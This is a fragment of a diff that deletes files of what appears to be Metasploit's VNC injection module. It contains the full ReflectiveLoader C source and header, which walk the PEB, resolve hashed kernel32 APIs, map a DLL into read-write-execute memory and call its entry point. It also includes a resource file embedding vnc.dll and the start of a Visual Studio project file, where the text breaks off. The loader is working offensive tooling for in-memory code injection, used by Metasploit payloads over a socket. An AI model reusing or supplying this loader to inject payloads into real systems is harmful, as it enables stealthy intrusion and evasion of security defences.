// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
|
|
||||||
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
|
|
||||||
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
|
|
||||||
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
|
|
||||||
|
|
||||||
// get the next entry in the current relocation block
|
|
||||||
uiValueD += sizeof( IMAGE_RELOC );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next entry in the relocation directory
|
|
||||||
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
|
|
||||||
/*
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
|
|
||||||
// check if their are any exception etries present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// get the number of entries
|
|
||||||
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
|
|
||||||
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all entries
|
|
||||||
while( uiValueA-- )
|
|
||||||
{
|
|
||||||
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
|
|
||||||
|
|
||||||
// get the next entry
|
|
||||||
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
}
|
|
||||||
}
|
|
||||||
*/
|
|
||||||
// STEP 7: call our images entry point
|
|
||||||
|
|
||||||
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
|
|
||||||
|
|
||||||
// call our respective entry point, fudging our hInstance value
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
|
|
||||||
#else
|
|
||||||
// if we are injecting an DLL via a stub we call DllMain with no parameter
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
|
|
||||||
return uiValueA;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// you must implement this function...
|
|
||||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
|
||||||
|
|
||||||
BOOL MetasploitDllAttach( SOCKET socket )
|
|
||||||
{
|
|
||||||
Init( socket );
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
|
||||||
{
|
|
||||||
switch( dwExitFunc )
|
|
||||||
{
|
|
||||||
case EXITFUNC_SEH:
|
|
||||||
SetUnhandledExceptionFilter( NULL );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_THREAD:
|
|
||||||
ExitThread( 0 );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_PROCESS:
|
|
||||||
ExitProcess( 0 );
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
|
||||||
{
|
|
||||||
BOOL bReturnValue = TRUE;
|
|
||||||
switch( dwReason )
|
|
||||||
{
|
|
||||||
case DLL_METASPLOIT_ATTACH:
|
|
||||||
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_METASPLOIT_DETACH:
|
|
||||||
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_QUERY_HMODULE:
|
|
||||||
if( lpReserved != NULL )
|
|
||||||
*(HMODULE *)lpReserved = hAppInstance;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_ATTACH:
|
|
||||||
hAppInstance = hinstDLL;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_DETACH:
|
|
||||||
case DLL_THREAD_ATTACH:
|
|
||||||
case DLL_THREAD_DETACH:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
return bReturnValue;
|
|
||||||
}
|
|
||||||
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,197 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
#include <Winsock2.h>
|
|
||||||
#include <intrin.h>
|
|
||||||
|
|
||||||
#include "ReflectiveDLLInjection.h"
|
|
||||||
|
|
||||||
#define EXITFUNC_SEH 0xEA320EFE
|
|
||||||
#define EXITFUNC_THREAD 0x0A2A1DE0
|
|
||||||
#define EXITFUNC_PROCESS 0x56A2B5F0
|
|
||||||
|
|
||||||
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
|
|
||||||
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
|
|
||||||
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
|
|
||||||
|
|
||||||
#define KERNEL32DLL_HASH 0x6A4ABC5B
|
|
||||||
#define LOADLIBRARYA_HASH 0xEC0E4E8E
|
|
||||||
#define GETPROCADDRESS_HASH 0x7C0DFCAA
|
|
||||||
#define VIRTUALALLOC_HASH 0x91AFCA54
|
|
||||||
|
|
||||||
#define HASH_KEY 13
|
|
||||||
//===============================================================================================//
|
|
||||||
#pragma intrinsic( _rotr )
|
|
||||||
|
|
||||||
__forceinline DWORD ror( DWORD d )
|
|
||||||
{
|
|
||||||
return _rotr( d, HASH_KEY );
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
__forceinline DWORD hash( char * c )
|
|
||||||
{
|
|
||||||
register DWORD h = 0;
|
|
||||||
do
|
|
||||||
{
|
|
||||||
h = ror( h );
|
|
||||||
h += *c;
|
|
||||||
} while( *++c );
|
|
||||||
|
|
||||||
return h;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
typedef struct _UNICODE_STR
|
|
||||||
{
|
|
||||||
USHORT Length;
|
|
||||||
USHORT MaximumLength;
|
|
||||||
PWSTR pBuffer;
|
|
||||||
} UNICODE_STR, *PUNICODE_STR;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
|
|
||||||
//__declspec( align(8) )
|
|
||||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
|
||||||
{
|
|
||||||
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
PVOID DllBase;
|
|
||||||
PVOID EntryPoint;
|
|
||||||
ULONG SizeOfImage;
|
|
||||||
UNICODE_STR FullDllName;
|
|
||||||
UNICODE_STR BaseDllName;
|
|
||||||
ULONG Flags;
|
|
||||||
SHORT LoadCount;
|
|
||||||
SHORT TlsIndex;
|
|
||||||
LIST_ENTRY HashTableEntry;
|
|
||||||
ULONG TimeDateStamp;
|
|
||||||
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
|
|
||||||
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
|
|
||||||
{
|
|
||||||
DWORD dwLength;
|
|
||||||
DWORD dwInitialized;
|
|
||||||
LPVOID lpSsHandle;
|
|
||||||
LIST_ENTRY InLoadOrderModuleList;
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
LPVOID lpEntryInProgress;
|
|
||||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
|
|
||||||
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
|
|
||||||
{
|
|
||||||
struct _PEB_FREE_BLOCK * pNext;
|
|
||||||
DWORD dwSize;
|
|
||||||
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
|
|
||||||
|
|
||||||
// struct _PEB is defined in Winternl.h but it is incomplete
|
|
||||||
// WinDbg> dt -v ntdll!_PEB
|
|
||||||
typedef struct __PEB // 65 elements, 0x210 bytes
|
|
||||||
{
|
|
||||||
BYTE bInheritedAddressSpace;
|
|
||||||
BYTE bReadImageFileExecOptions;
|
|
||||||
BYTE bBeingDebugged;
|
|
||||||
BYTE bSpareBool;
|
|
||||||
LPVOID lpMutant;
|
|
||||||
LPVOID lpImageBaseAddress;
|
|
||||||
PPEB_LDR_DATA pLdr;
|
|
||||||
LPVOID lpProcessParameters;
|
|
||||||
LPVOID lpSubSystemData;
|
|
||||||
LPVOID lpProcessHeap;
|
|
||||||
PRTL_CRITICAL_SECTION pFastPebLock;
|
|
||||||
LPVOID lpFastPebLockRoutine;
|
|
||||||
LPVOID lpFastPebUnlockRoutine;
|
|
||||||
DWORD dwEnvironmentUpdateCount;
|
|
||||||
LPVOID lpKernelCallbackTable;
|
|
||||||
DWORD dwSystemReserved;
|
|
||||||
DWORD dwAtlThunkSListPtr32;
|
|
||||||
PPEB_FREE_BLOCK pFreeList;
|
|
||||||
DWORD dwTlsExpansionCounter;
|
|
||||||
LPVOID lpTlsBitmap;
|
|
||||||
DWORD dwTlsBitmapBits[2];
|
|
||||||
LPVOID lpReadOnlySharedMemoryBase;
|
|
||||||
LPVOID lpReadOnlySharedMemoryHeap;
|
|
||||||
LPVOID lpReadOnlyStaticServerData;
|
|
||||||
LPVOID lpAnsiCodePageData;
|
|
||||||
LPVOID lpOemCodePageData;
|
|
||||||
LPVOID lpUnicodeCaseTableData;
|
|
||||||
DWORD dwNumberOfProcessors;
|
|
||||||
DWORD dwNtGlobalFlag;
|
|
||||||
LARGE_INTEGER liCriticalSectionTimeout;
|
|
||||||
DWORD dwHeapSegmentReserve;
|
|
||||||
DWORD dwHeapSegmentCommit;
|
|
||||||
DWORD dwHeapDeCommitTotalFreeThreshold;
|
|
||||||
DWORD dwHeapDeCommitFreeBlockThreshold;
|
|
||||||
DWORD dwNumberOfHeaps;
|
|
||||||
DWORD dwMaximumNumberOfHeaps;
|
|
||||||
LPVOID lpProcessHeaps;
|
|
||||||
LPVOID lpGdiSharedHandleTable;
|
|
||||||
LPVOID lpProcessStarterHelper;
|
|
||||||
DWORD dwGdiDCAttributeList;
|
|
||||||
LPVOID lpLoaderLock;
|
|
||||||
DWORD dwOSMajorVersion;
|
|
||||||
DWORD dwOSMinorVersion;
|
|
||||||
WORD wOSBuildNumber;
|
|
||||||
WORD wOSCSDVersion;
|
|
||||||
DWORD dwOSPlatformId;
|
|
||||||
DWORD dwImageSubsystem;
|
|
||||||
DWORD dwImageSubsystemMajorVersion;
|
|
||||||
DWORD dwImageSubsystemMinorVersion;
|
|
||||||
DWORD dwImageProcessAffinityMask;
|
|
||||||
DWORD dwGdiHandleBuffer[34];
|
|
||||||
LPVOID lpPostProcessInitRoutine;
|
|
||||||
LPVOID lpTlsExpansionBitmap;
|
|
||||||
DWORD dwTlsExpansionBitmapBits[32];
|
|
||||||
DWORD dwSessionId;
|
|
||||||
ULARGE_INTEGER liAppCompatFlags;
|
|
||||||
ULARGE_INTEGER liAppCompatFlagsUser;
|
|
||||||
LPVOID lppShimData;
|
|
||||||
LPVOID lpAppCompatInfo;
|
|
||||||
UNICODE_STR usCSDVersion;
|
|
||||||
LPVOID lpActivationContextData;
|
|
||||||
LPVOID lpProcessAssemblyStorageMap;
|
|
||||||
LPVOID lpSystemDefaultActivationContextData;
|
|
||||||
LPVOID lpSystemAssemblyStorageMap;
|
|
||||||
DWORD dwMinimumStackCommit;
|
|
||||||
} _PEB, * _PPEB;
|
|
||||||
|
|
||||||
typedef struct
|
|
||||||
{
|
|
||||||
WORD offset:12;
|
|
||||||
WORD type:4;
|
|
||||||
} IMAGE_RELOC, *PIMAGE_RELOC;
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,6 +0,0 @@
|
||||||
|
|
||||||
#ifdef _X64_
|
|
||||||
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
|
|
||||||
#else
|
|
||||||
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
|
|
||||||
#endif
|
|
|
@ -1,437 +0,0 @@
|
||||||
<?xml version="1.0" encoding="Windows-1252"?>
|
|
||||||
<VisualStudioProject
|
|
||||||
ProjectType="Visual C++"
|
|
||||||
Version="9.00"
|
|
||||||
Name="loader"
|
|
||||||
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
|
|
||||||
RootNamespace="loader"
|
|
||||||
Keyword="Win32Proj"
|
|
||||||
TargetFrameworkVersion="196613"
|
|
||||||
>
|
|
||||||
<Platforms>
|
|
||||||
<Platform
|
|
||||||
Name="Win32"
|
|
||||||
/>
|
|
||||||
<Platform
|
|
||||||
Name="x64"
|
|
||||||
/>
|
|
||||||
</Platforms>
|
|
||||||
<ToolFiles>
|
|
||||||
</ToolFiles>
|
|
||||||
<Configurations>
|
|
||||||
<Configuration
|
|
||||||
Name="Debug|Win32"
|
|
||||||
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
CharacterSet="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCustomBuildTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXMLDataGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCWebServiceProxyGeneratorTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCMIDLTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCCLCompilerTool"
|
|
||||||
Optimization="0"
|
|
||||||
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
|
|
||||||
MinimalRebuild="true"
|
|
||||||
BasicRuntimeChecks="3"
|
|
||||||
RuntimeLibrary="3"
|
|
||||||
UsePrecompiledHeader="0"
|
|
||||||
WarningLevel="3"
|
|
||||||
DebugInformationFormat="4"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManagedResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCResourceCompilerTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreLinkEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCLinkerTool"
|
|
||||||
LinkIncremental="2"
|
|
||||||
GenerateDebugInformation="true"
|
|
||||||
SubSystem="2"
|
|
||||||
TargetMachine="1"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCALinkTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCManifestTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCXDCMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCBscMakeTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCFxCopTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCAppVerifierTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
Name="VCPostBuildEventTool"
|
|
||||||
/>
|
|
||||||
</Configuration>
|
|
||||||
<Configuration
|
|
||||||
Name="Debug|x64"
|
|
||||||
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
|
|
||||||
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
|
|
||||||
ConfigurationType="2"
|
|
||||||
CharacterSet="1"
|
|
||||||
>
|
|
||||||
<Tool
|
|
||||||
Name="VCPreBuildEventTool"
|
|
||||||
/>
|
|
||||||
<Tool
|
|
||||||
